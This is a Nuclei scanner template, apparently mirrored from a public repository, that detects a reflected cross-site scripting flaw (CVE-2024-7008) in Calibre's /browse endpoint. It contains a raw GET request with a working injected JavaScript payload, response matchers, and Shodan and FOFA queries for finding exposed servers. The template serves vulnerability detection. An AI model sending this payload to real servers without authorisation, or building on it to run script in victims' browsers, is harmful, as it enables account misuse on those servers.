daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-7008.yaml

39 lines
1.5 KiB
YAML
Raw Normal View History

Create CVE-2024-7008.yaml
2024-07-31 16:32:06 +00:00
id: CVE-2024-7008
info:
name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK
severity: medium
description: |
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attackers JavaScript code in the context of the victims browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
reference:
- https://starlabs.sg/advisories/24/24-7008/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,xss
http:
- raw:
- |
GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
- type: status
status:
- 200
Auto Template Signing [Thu Aug 8 07:28:47 UTC 2024] :robot:
2024-08-08 07:28:47 +00:00
# digest: 490a004630440220204753a269829273bf653d6bc90e49f892dbce2ee36a361edb1e33a0537442da02203a4a9991048fd3702d95471a875fb381c0fa628e090a0f4156c8f876dae1be48:922c64590222798bb761d5b6d8e72950